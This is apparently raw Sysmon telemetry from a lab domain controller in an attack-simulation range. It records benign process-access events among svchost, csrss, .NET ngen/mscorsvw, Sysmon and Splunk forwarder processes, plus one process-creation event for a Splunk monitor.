13:45:35.329{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90FF-6005-6D01-00000000A301}2856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:35.313{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90FF-6005-6D01-00000000A301}2856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:35.313{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90FF-6005-6D01-00000000A301}2856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:36.110{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9100-6005-6E01-00000000A301}4188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:36.094{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9100-6005-6E01-00000000A301}4188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:36.094{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9100-6005-6E01-00000000A301}4188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.703{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9108-6005-6F01-00000000A301}3528C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.703{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9108-6005-6F01-00000000A301}3528C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.703{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9108-6005-6F01-00000000A301}3528C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:44.704{59A5CD1D-9108-6005-6F01-00000000A301}3528C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.547{59A5CD1D-9109-6005-7001-00000000A301}37321512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9109-6005-7001-00000000A301}3732C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 